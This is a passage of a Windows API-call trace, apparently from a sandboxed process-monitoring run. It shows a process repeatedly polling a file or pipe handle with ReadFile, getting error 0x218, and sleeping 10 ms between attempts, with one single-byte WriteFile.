	[0224.220] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0224.220] GetLastError () returned 0x218
	[0224.221] Sleep (dwMilliseconds=0xa) 
	[0224.236] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0224.236] GetLastError () returned 0x218
	[0224.236] Sleep (dwMilliseconds=0xa) 
	[0224.282] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0224.282] GetLastError () returned 0x218
	[0224.282] Sleep (dwMilliseconds=0xa) 
	[0224.329] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0224.329] GetLastError () returned 0x218
	[0224.329] Sleep (dwMilliseconds=0xa) 
	[0224.358] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0224.358] GetLastError () returned 0x218
	[0224.358] Sleep (dwMilliseconds=0xa) 
	[0224.360] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0224.360] GetLastError () returned 0x218
	[0224.360] Sleep (dwMilliseconds=0x3e8) 
	[0225.486] WriteFile (in: hFile=0x258, lpBuffer=0x116f4dc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0) returned 0
	[0225.486] Sleep (dwMilliseconds=0xa) 
	[0225.561] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0225.561] GetLastError () returned 0x218
	[0225.561] Sleep (dwMilliseconds=0xa) 
	[0225.635] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0225.636] GetLastError () returned 0x218
	[0225.636] Sleep (dwMilliseconds=0xa) 
	[0225.659] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0225.659] GetLastError () returned 0x218
	[0225.659] Sleep (dwMilliseconds=0xa) 
	[0225.670] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0225.670] GetLastError () returned 0x218
	[0225.670] Sleep (dwMilliseconds=0xa) 
	[0225.686] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0225.686] GetLastError () returned 0x218
	[0225.686] Sleep (dwMilliseconds=0xa) 
	[0225.701] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0225.702] GetLastError () returned 0x218
	[0225.702] Sleep (dwMilliseconds=0xa) 
	[0225.717] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0225.717] GetLastError () returned 0x218
	[0225.717] Sleep (dwMilliseconds=0xa) 
	[0225.733] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0225.733] GetLastError () returned 0x218
	[0225.733] Sleep (dwMilliseconds=0xa) 
	[0225.779] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0225.779] GetLastError () returned 0x218
	[0225.780] Sleep (dwMilliseconds=0xa) 
	[0225.826] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0225.826] GetLastError () returned 0x218
	[0225.826] Sleep (dwMilliseconds=0xa) 
	[0225.861] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0225.861] GetLastError () returned 0x218
	[0225.861] Sleep (dwMilliseconds=0xa) 
	[0225.873] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0225.873] GetLastError () returned 0x218
	[0225.873] Sleep (dwMilliseconds=0xa) 
	[0225.889] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0225.889] GetLastError () returned 0x218
	[0225.889] Sleep (dwMilliseconds=0xa) 
	[0225.905] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0225.905] GetLastError () returned 0x218
	[0225.905] Sleep (dwMilliseconds=0xa) 
	[0225.920] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0225.920] GetLastError () returned 0x218
	[0225.920] Sleep (dwMilliseconds=0xa) 
	[0225.937] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0225.937] GetLastError () returned 0x218
	[0225.937] Sleep (dwMilliseconds=0xa) 
	[0225.951] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0225.951] GetLastError () returned 0x218
	[0225.952] Sleep (dwMilliseconds=0xa) 
	[0225.967] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0225.967] GetLastError () returned 0x218
	[0225.967] Sleep (dwMilliseconds=0xa) 
	[0226.045] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0226.045] GetLastError () returned 0x218
	[0226.046] Sleep (dwMilliseconds=0xa) 
	[0226.138] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0226.138] GetLastError () returned 0x218
	[0226.138] Sleep (dwMilliseconds=0xa) 
	[0226.229] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0226.229] GetLastError () returned 0x218
	[0226.230] Sleep (dwMilliseconds=0xa) 
	[0226.498] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0226.498] GetLastError () returned 0x218
	[0226.498] Sleep (dwMilliseconds=0xa) 
	[0226.513] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0226.513] GetLastError () returned 0x218
	[0226.513] Sleep (dwMilliseconds=0xa) 
	[0226.840] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0226.840] GetLastError () returned 0x218
	[0226.840] Sleep (dwMilliseconds=0xa) 
	[0226.887] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0226.887] GetLastError () returned 0x218
	[0226.887] Sleep (dwMilliseconds=0xa) 
	[0226.931] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0226.931] GetLastError () returned 0x218
	[0226.931] Sleep (dwMilliseconds=0xa) 
	[0226.938] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0226.938] GetLastError () returned 0x218
	[0226.938] Sleep (dwMilliseconds=0xa) 
	[0226.950] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0226.950] GetLastError () returned 0x218
	[0226.950] Sleep (dwMilliseconds=0xa) 
	[0226.965] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0226.965] GetLastError () returned 0x218
	[0226.966] Sleep (dwMilliseconds=0xa) 
	[0226.981] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0226.981] GetLastError () returned 0x218
	[0226.981] Sleep (dwMilliseconds=0xa) 
	[0226.996] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0226.996] GetLastError () returned 0x218
	[0226.997] Sleep (dwMilliseconds=0xa) 
	[0227.015] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.015] GetLastError () returned 0x218
	[0227.015] Sleep (dwMilliseconds=0xa) 
	[0227.028] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.028] GetLastError () returned 0x218
	[0227.028] Sleep (dwMilliseconds=0xa) 
	[0227.075] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.075] GetLastError () returned 0x218
	[0227.075] Sleep (dwMilliseconds=0xa) 
	[0227.121] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.121] GetLastError () returned 0x218
	[0227.121] Sleep (dwMilliseconds=0xa) 
	[0227.163] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.163] GetLastError () returned 0x218
	[0227.163] Sleep (dwMilliseconds=0xa) 
	[0227.168] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.168] GetLastError () returned 0x218
	[0227.168] Sleep (dwMilliseconds=0xa) 
	[0227.183] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.183] GetLastError () returned 0x218
	[0227.183] Sleep (dwMilliseconds=0xa) 
	[0227.233] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.233] GetLastError () returned 0x218
	[0227.233] Sleep (dwMilliseconds=0xa) 
	[0227.258] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.258] GetLastError () returned 0x218
	[0227.258] Sleep (dwMilliseconds=0xa) 
	[0227.297] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.297] GetLastError () returned 0x218
	[0227.297] Sleep (dwMilliseconds=0xa) 
	[0227.346] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.346] GetLastError () returned 0x218
	[0227.347] Sleep (dwMilliseconds=0xa) 
	[0227.386] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.386] GetLastError () returned 0x218
	[0227.386] Sleep (dwMilliseconds=0xa) 
	[0227.433] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.433] GetLastError () returned 0x218
	[0227.433] Sleep (dwMilliseconds=0xa) 
	[0227.449] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.449] GetLastError () returned 0x218
	[0227.449] Sleep (dwMilliseconds=0xa) 
	[0227.464] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.464] GetLastError () returned 0x218
	[0227.465] Sleep (dwMilliseconds=0xa) 
	[0227.480] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.480] GetLastError () returned 0x218
	[0227.480] Sleep (dwMilliseconds=0xa) 
	[0227.495] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.496] GetLastError () returned 0x218
	[0227.496] Sleep (dwMilliseconds=0xa) 
	[0227.512] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.512] GetLastError () returned 0x218
	[0227.512] Sleep (dwMilliseconds=0xa) 
	[0227.527] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.527] GetLastError () returned 0x218
	[0227.527] Sleep (dwMilliseconds=0xa) 
	[0227.543] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.544] GetLastError () returned 0x218
	[0227.544] Sleep (dwMilliseconds=0xa) 
	[0227.589] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.589] GetLastError () returned 0x218
	[0227.589] Sleep (dwMilliseconds=0xa) 
	[0227.637] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.637] GetLastError () returned 0x218
	[0227.637] Sleep (dwMilliseconds=0xa) 
	[0227.683] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.683] GetLastError () returned 0x218
	[0227.683] Sleep (dwMilliseconds=0xa) 
	[0227.699] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.699] GetLastError () returned 0x218
	[0227.699] Sleep (dwMilliseconds=0xa) 
	[0227.714] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.714] GetLastError () returned 0x218
	[0227.714] Sleep (dwMilliseconds=0xa) 
	[0227.730] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.730] GetLastError () returned 0x218
	[0227.730] Sleep (dwMilliseconds=0xa) 
	[0227.746] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.747] GetLastError () returned 0x218
	[0227.747] Sleep (dwMilliseconds=0xa) 
	[0227.761] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.761] GetLastError () returned 0x218
	[0227.761] Sleep (dwMilliseconds=0xa) 
	[0227.777] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.777] GetLastError () returned 0x218
	[0227.777] Sleep (dwMilliseconds=0xa) 
	[0227.792] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.792] GetLastError () returned 0x218
	[0227.792] Sleep (dwMilliseconds=0xa) 
	[0227.839] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.839] GetLastError () returned 0x218
	[0227.839] Sleep (dwMilliseconds=0xa) 
	[0227.886] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.886] GetLastError () returned 0x218
	[0227.886] Sleep (dwMilliseconds=0xa) 
	[0227.931] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.931] GetLastError () returned 0x218
	[0227.931] Sleep (dwMilliseconds=0xa) 
	[0227.938] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.939] GetLastError () returned 0x218
	[0227.939] Sleep (dwMilliseconds=0xa) 
	[0227.948] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.948] GetLastError () returned 0x218
	[0227.948] Sleep (dwMilliseconds=0xa) 
	[0227.963] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.964] GetLastError () returned 0x218
	[0227.964] Sleep (dwMilliseconds=0xa) 
	[0227.979] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.979] GetLastError () returned 0x218
	[0227.979] Sleep (dwMilliseconds=0xa) 
	[0227.995] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0227.995] GetLastError () returned 0x218
	[0227.995] Sleep (dwMilliseconds=0xa) 
